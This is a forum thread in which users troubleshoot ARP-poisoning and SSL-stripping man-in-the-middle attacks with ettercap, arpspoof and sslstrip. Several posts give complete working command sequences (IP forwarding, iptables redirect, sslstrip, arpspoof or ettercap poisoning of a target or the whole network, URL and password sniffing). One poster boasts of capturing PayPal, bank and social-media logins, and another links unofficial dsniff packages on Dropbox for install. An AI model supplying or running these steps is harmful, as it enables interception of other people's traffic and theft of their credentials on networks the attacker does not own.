Ettercap Problem(s)

[AdamElite]

Hi guys,

First thing, I know there's a lot of ettercap threads lying around the forums and all over the internet but I can't put my finger on the issue.

I will start by saying I am running Kali Linux and Backtrack 5 R2 and R3 in a VM I simply cannot get ettercap to work.. I've tried the GUI and command line. I've edited the config as followed in tutorials.
I've made sure it is forwarding (e.g. echo 1 > /proc/sys/net/ipv4/ip_forward) but ettercap simply won't capture any data. At one stage it did work on my BTR2 but does not now. I can't get SSLstrip to work either..

I've tried countless MITM scripts that "should" do all the required setting up. I've updated ettercap to the latest update and still nothing.. I'm stuck and have no where to turn too.. Just wondering if it's my setting up config or my
network is just immune to ettercap?

I've started blank copies of all OS's to see if I had done any mistakes and yet it still won't work. Any help would be greatly appreciated. I would like to get this sorted once and for all!

Thanks.

P.S If you need any more information I will be happy to edit and post them.

[zartas]

try to boot from a live usb instead of using vm's for compatibility issues

[omegear]

Yep, boot from Live or install it.
VM is always a trick-road and should not be used as permanent solution. Not much support for VM too.

Anyway, post logs or error message maybe I can help

[Lordx19]

Are you arp poisoning? If you're not, then no traffic will get redirected to you, meaning none will be sslstripped and nothing will be logged

[Lordx19]

This is what I do
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -k -l 8080 #to listen for traffic going through your redirected port, 8080

I then move that terminal and open a new one and use

arpspoof -i wlan0 -t 192.168.1.20 192.168.1.1 (FIRST ONE IS TARGET, SECOND IS GATEWAY)

and leave that open

afterwards you can run use urlsnarf -i wlan0 to sniff urls

for credentials, I open another window and use

ettercap -T -q -i wlan0 #to sniff for passwords ONLY.

Make sure you removed the comments from iptables reddir on and off. If you want to use etter for everything and not use arpspoof, follow those steps but after the sslstrip step use

Ettercap -T -q -i wlan0 -M arp // //

That will spoof the whole network.
Or do /191.168.4.1/ for a specific ip

[AdamElite]

Thanks for the replies. I will give them ago. I generally use VM because it allows you to save data. I will try the live CD's. Is there a way to arpspoof the entire network and not one target at a time?

P.S Doing the following steps suggested, I always seem to run into the untrusted certificate. Any clues?

[AdamElite]

Update: After giving them ago, I found only some sites will give data. Regardless if it is https or http. I cannot get sslstrip to strip the https down to http. It will simply will not work. I'm confused, I've followed the steps.

[Lordx19]

You're supposed to get untrusted since it's becoming http and not https, it's no longer safe. Most people ignore it. It could be because you're using a VM. I have it installed to my HD and it strips everything. PayPal, banks, Facebook, twitter. To poison the whole network, I use ettercap.
Ettercap -T -q -i wlan0 -M arp //

[Lordx19]

I'm just confirming that I have that method working flawlessly. I use 64 bit and it's my only OS on my PC. everything is updated to the latest version. It strips every site.

[AdamElite]

I was using a live cd of kali. I'll have to have a play around and see what I can do.

[Lordx19]

Yeah I know there are some issues with a live CD. Sorry, I can't help you with the live CD issue :/

[AdamElite]

After I accept the untrusted cert, it just times out? You got any clues Lord?

[Lordx19]

I don't know why it's doing that :/ has to be from the live boot. I get 0 problems with the HD install

[AdamElite]

Mm, alright. Might need to try a HD install.

[Lordx19]

Let me know if your issue is resolved

[kirito]

hi,
every time i want to do MITM, i just use this syntax

ettercap -TqM arp:remote -i wlan0 // //

press L to see if there any client online to the network which is you're connected in.

then press P to show available plugins
i use

ssl_strip

and somehow i can get a lot of https credential

[AdamElite]

hi,
every time i want to do MITM, i just use this syntax



press L to see if there any client online to the network which is you're connected in.

then press P to show available plugins
i use

and somehow i can get a lot of https credential

Is that with a live cd? HDD install? VM?

[AdamElite]

Update: Ettercap seems to capture most HTTP details fine, but it won't with sslstrip.. Sometimes it will time out, won't capture details, may give untrusted cert but still won't capture. I'm under the impression that it's an issue with sslstrip.

[Lordx19]

my command for sslstrip is sslstrip -k -l 8080

I used it yesterday and it stripped everything

[Lordx19]

This is exactly what I do in this order

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -k -l 8080

then

arpspoof -i eth1 -t 192.168.0.13 192.168.0.1 (FIRST ONE IS TARGET, SECOND IS GATEWAY)

after you can run urlsnarf -i wlan0 to sniff urls

driftnet -i wlan0 to sniff pictures

or run ettercap -T -q -i wlan0 to sniff passwords

if you want to use only ettercap, follow the above instructions but instead of arpspoof type
ettercap -T -q -i wlan0 -M arp // // to sniff the whole network

[AdamElite]

Okay, I've got it to semi-work. Mostly only on IE. If I type, in the broswer; paypal.com - it will automatically go to http. But if I type or click a recent link such as, https://www.paypal.com then it won't strip it. It may give the untrusted cert but after clicking ignore or whatever it may be, it just continues on with https.

Is this how it's meant to act? Or is there another issue at hand.

Examples
IE = Strips if I type paypal.com and it will redirect to http://www.paypal.com, but not if you click a recent link with https in the link. Or, type https yourself.
Firefox = Will give untrusted cert, by accepting it may time out, keep asking for the cert to be accepted.
Chrome = Will give untrusted cert but will not allow you to accept and move on.

Edit: added examples.

[Lordx19]

I've tested it with safari and firefox. You may have to clear your cache.

[AdamElite]

Coming back with an update, doing some experimenting on the live cd. I've noticed, I can capture everything fine on my other laptop. It wont capture on the actual attacking machine, and it won't capture at all on another laptop. Odd init?

[brazen]

I have kali installed on my hd (mbp Intel i7 2.3GHz) everything is running beautifully! I am just starting with ettercap -G. I have watched youtube videos, read forums, etc... It is running really slow on victim computer (my iMac).

I am using these are my main resources:
***REMOVED***
http://www.hackcommunity.com/Thread-...tack-SSL-Strip
i have modified my ettercap to run as admin
i am doing the port forward (even though i don't believe that i need to do this as i am on my LAN
unified sniffing, my interface is wlan0 for wifi, scan hosts (i find 5), choose my victim as Target 1, and router as Target 2
arp poisoning and start sniffing

this causes the network on victim computer to be very slow, so slow in fact that pages wont load in browser.
however, the speed on my mbp that i am working from with ettecap -G has so speed issues when browsing.

Can someone please point out my errors?

any and all help appreciated!

Thanks

[AdamElite]

I have kali installed on my hd (mbp Intel i7 2.3GHz) everything is running beautifully! I am just starting with ettercap -G. I have watched youtube videos, read forums, etc... It is running really slow on victim computer (my iMac).

I am using these are my main resources:
*RMOVED*
http://www.hackcommunity.com/Thread-...tack-SSL-Strip[/B]

i have modified my ettercap to run as admin
i am doing the port forward (even though i don't believe that i need to do this as i am on my LAN
unified sniffing, my interface is wlan0 for wifi, scan hosts (i find 5), choose my victim as Target 1, and router as Target 2
arp poisoning and start sniffing

this causes the network on victim computer to be very slow, so slow in fact that pages wont load in browser.
however, the speed on my mbp that i am working from with ettecap -G has so speed issues when browsing.

Can someone please point out my errors?

any and all help appreciated!

Thanks

What version of ettercap are you using? Try using the command line and see if that helps.

[Fattman]

Hi mate,

i have also found the same issue when running 'ettercap' within a VM. I had mine set up so the laptop i was using had two alfa cards connected one for the victim (windows) and one for attack (kali) both connected to my captive portal. After spending the best part of 8 hours trying to work out why they wouldnt work i attempted exactly the same steps using a live boot and it worked fine.

The only conclusion i can come to is that it doesnt like running within a virtual environment. I am not sure why since many of the threads i read didnt have any fix for the issue.

It would be great if someone on here could solve the problem since i now have rebuild my Kali linux install on a different laptop and have my VM already set up how i want it.

[brazen]

I have no VM involved with my setup. I have kali on my laptop and attacking my iMac. :/

[zimmaro]

I have kali installed on my hd (mbp Intel i7 2.3GHz) everything is running beautifully! I am just starting with ettercap -G. I have watched youtube videos, read forums, etc... It is running really slow on victim computer (my iMac).

I am using these are my main resources:
***YOUTUBE****
http://www.hackcommunity.com/Thread-...tack-SSL-Strip[/B]

i have modified my ettercap to run as admin
i am doing the port forward (even though i don't believe that i need to do this as i am on my LAN
unified sniffing, my interface is wlan0 for wifi, scan hosts (i find 5), choose my victim as Target 1, and router as Target 2
arp poisoning and start sniffing

this causes the network on victim computer to be very slow, so slow in fact that pages wont load in browser.
however, the speed on my mbp that i am working from with ettecap -G has so speed issues when browsing.

Can someone please point out my errors?

any and all help appreciated!

Thanks

hi
if you want to try this test-mode:
https://vimeo.com/77961423
bye

PS:sorry for the bad write-explanation during the CAMREC

[brazen]

great video ... very impressive.

a few rookie questions:
1. does this work only on eth0 or will this work with wlan0 as well (i am not using a vm).
2. once those changes are made, they are permanent? I won't need to do port forwarding and sslstrip everytime, or do I still need to do that everytime?
3. Are you able to show that video in a higher resolution as there are some things that I am not able to see clearly.

THANKS for your help... I can't wait to try this out!

[brazen]

i tried this, but i think i made errors as i wasn't able to view clearly and was guessing on some text. i was not able to successfully do the arpspoofing section

[zimmaro]

great video ... very impressive.

a few rookie questions:
1. does this work only on eth0 or will this work with wlan0 as well (i am not using a vm).
2. once those changes are made, they are permanent? I won't need to do port forwarding and sslstrip everytime, or do I still need to do that everytime?
3. Are you able to show that video in a higher resolution as there are some things that I am not able to see clearly.

THANKS for your help... I can't wait to try this out!

hi @ brazen

However, I can express my humble thought ( I'm a mechanic ) ..
now all " " providers " " use authentications secure (HTTPS) and all browsers ( UPDATE) can " " recognize "" and " " lock " " the " " arp - attacks " " on the network via ... " " security certificates " "
For years sslstrip (the tool) gives us' a hand to try to escape this !
but it is not always party! ! (es: twitter, facebook ect ... )
the only thing that I 've noticed in my HOME -lab -test ( in recent times ) that ARP - POISON created with ettercap creates problems ... slow traffic .... certificate problems ( by stripping as well .. ) . ect .. ...
and the good old dsniff ( arpspoof ) [ in my case I do NOT use the default version in kali ] to be a lot less trouble ! !

this is just my thoughts I am not a " " technical "" " I. .. I just test in my house !

about your questions :
1 work fine in wifi ( wlan ) in phisical -machine
2 you can switch on / off to ip_forward && sslstrip is necessary for " " stripped " " https to http traffic
3 NO , I suck at making videos !

bye

[brazen]

zimmaro...
awesome video... i was able to view it just fine on my tablet. I did just what you said and it worked great!

just as a note: i went to install some packages afterwards and i was getting errors. i had to do a 'apt-get -f install' with no packages. this forced the dsniff to go backup to 22 instead of the 18. so the whole process would need to be completed again if anyone else goes to install certain packages aftwards (not sure if this happens with all packages or not).

2 thumbs up! thanks again zimmaro!

[zimmaro]

zimmaro...
awesome video... i was able to view it just fine on my tablet. I did just what you said and it worked great!

just as a note: i went to install some packages afterwards and i was getting errors. i had to do a 'apt-get -f install' with no packages. this forced the dsniff to go backup to 22 instead of the 18. so the whole process would need to be completed again if anyone else goes to install certain packages aftwards (not sure if this happens with all packages or not).

2 thumbs up! thanks again zimmaro!

@brazen
if you want
in MY kali(standart-Kernel) a made this mode
###download a ""good-dsniff"" package[32 or 64](my-dropbox):
https://www.dropbox.com/sh/5uagx5jg4jvkoys/VgGzaLXIiB

###remove default:
apt-get remove dsniff

###install a download package:
dpkg -i dsniff_2.4b1+debian.............

###if you are satisfied of this version (18) && don't want to return at default (22) after next apt-get upgrade give to LOCK a single packet(dsniff)!!!
echo dsniff hold | dpkg --set-selections

after this if you give apt-get upgrade.... get in MY case:

root@kali:~# apt-get dist-upgrade
Lettura elenco dei pacchetti... Fatto
Generazione albero delle dipendenze
Lettura informazioni sullo stato... Fatto
Calcolo dell'aggiornamento... Eseguito
I seguenti pacchetti sono stati mantenuti alla versione attuale:
chntpw dsniff gpsd libnfc4 mfcuk mfoc
I seguenti pacchetti saranno aggiornati:
set
1 aggiornati, 0 installati, 0 da rimuovere e 6 non aggiornati.
È necessario scaricare 44,9 MB di archivi.
Dopo quest'operazione, verranno occupati 0 B di spazio su disco.
Continuare [S/n]?

.............THE REDS are MY(only-MY-for test) LOCKED package

[brazen]

root@kali:~# dpkg -i dsniff_2.4b1+-18_amd64.deb
Selecting previously unselected package dsniff.
(Reading database ... 345366 files and directories currently installed.)
Unpacking dsniff (from dsniff_2.4b1+-18_amd64.deb) ...
dpkg: dependency problems prevent configuration of dsniff:
dsniff depends on libdb4.6; however:
Package libdb4.6 is not installed.
dsniff depends on libssl0.9.8 (>= 0.9.8f-5); however:
Package libssl0.9.8 is not installed.

dpkg: error processing dsniff (--install):
dependency problems - leaving unconfigured
Processing triggers for man-db ...
Errors were encountered while processing:
dsniff

note: i had downloaded the 18 version from online yesterday and it worked great. i went and downloaded yours as well (wondering if you had mad any modifications to it) and when I do the dpkt -i ... i get the result as posted in this post above.
i continued forward and did the dpkg --list |grep dsniff to see if the 18 did install. it seems to have installed, but now when i get to the point of : arpspoof -i wlan0 192.168.1.1
all of the computers (except the one i am working from) lose internet connection.

any ideas on what I am doing wrong?
please advise

[zimmaro]

root@kali:~# dpkg -i dsniff_2.4b1+-18_amd64.deb
Selecting previously unselected package dsniff.
(Reading database ... 345366 files and directories currently installed.)
Unpacking dsniff (from dsniff_2.4b1+-18_amd64.deb) ...
dpkg: dependency problems prevent configuration of dsniff:
dsniff depends on libdb4.6; however:
Package libdb4.6 is not installed.
dsniff depends on libssl0.9.8 (>= 0.9.8f-5); however:
Package libssl0.9.8 is not installed.

dpkg: error processing dsniff (--install):
dependency problems - leaving unconfigured
Processing triggers for man-db ...
Errors were encountered while processing:
dsniff

note: i had downloaded the 18 version from online yesterday and it worked great. i went and downloaded yours as well (wondering if you had mad any modifications to it) and when I do the dpkt -i ... i get the result as posted in this post above.
i continued forward and did the dpkg --list |grep dsniff to see if the 18 did install. it seems to have installed, but now when i get to the point of : arpspoof -i wlan0 192.168.1.1
all of the computers (except the one i am working from) lose internet connection.

any ideas on what I am doing wrong?
please advise

hi@brazen you ...nothing...

sorry !!!
that forgetful that are
fix the 2 dependencies!!!!!!
https://www.dropbox.com/sh/l63szq3gjo5ju5x/H53OBAaC8q
dpkg -i for 2 packets && after dpkg for dsniff

[brazen]

Thank you. Ill try this tomorrow.

You are a great help. I hope to know all that you know one day!

[brazen]

just did it. works perfect. thank you. bye

[brazen]

root@kali:~# find / -name etter.conf
/etc/ettercap/etter.conf
/etc/etter.conf
root@kali:~#


which etter.conf file needs to be adusted? or both?
i was getting an error in ettercap -G:

Listening on:
wlan0 -> B8:8D:12:30:6B:F2
192.168.1.128/255.255.255.0
fe80::ba8d:12ff:fe30:6bf2/64

Privileges dropped to UID 0 GID 0... (EDIT ~ this was saying 65534 due to having the # in etter.conf file, which is why i change both files by deleting # and changing 65534 to 0). i went and check both files. one was changed, the other was not. so i also changed the UID and GID on the second file as well (0).

the other computers on the network are not able to connect to websites on the internet when i do the: arpspoof -i wlan0 192.168.1.1
sometimes, if i do the arpspoof -i wlan0 192.168.1.1 and then turn it off (by closing that terminal) and issue the command a second time... it will then work, but not always

everytime i get it working, i change something and i end up back here asking questions... lol

also, what is the difference between using kali 10 vs 10.7-trunk?

[zimmaro]

root@kali:~# find / -name etter.conf
/etc/ettercap/etter.conf
/etc/etter.conf
root@kali:~#


which etter.conf file needs to be adusted? or both?
i was getting an error in ettercap -G:

Listening on:
wlan0 -> B8:8D:12:30:6B:F2
192.168.1.128/255.255.255.0
fe80::ba8d:12ff:fe30:6bf2/64

Privileges dropped to UID 0 GID 0... (EDIT ~ this was saying 65534 due to having the # in etter.conf file, which is why i change both files by deleting # and changing 65534 to 0). i went and check both files. one was changed, the other was not. so i also changed the UID and GID on the second file as well (0).

the other computers on the network are not able to connect to websites on the internet when i do the: arpspoof -i wlan0 192.168.1.1
sometimes, if i do the arpspoof -i wlan0 192.168.1.1 and then turn it off (by closing that terminal) and issue the command a second time... it will then work, but not always

everytime i get it working, i change something and i end up back here asking questions... lol

also, what is the difference between using kali 10 vs 10.7-trunk?

in MY-kali is in /etc/ettercap/ && I adjusted these lines:

root@kali:~# cat /etc/ettercap/etter.conf |grep -e 'ec_' -e 'iptables'
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
root@kali:~#

[brazen]

here is mine:

root@kali:~# cat /etc/ettercap/etter.conf |grep -e 'ec_' -e 'iptables'
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
root@kali:~#


EDIT - i think my vpn was messing things up. i was doing this while connected to vpn.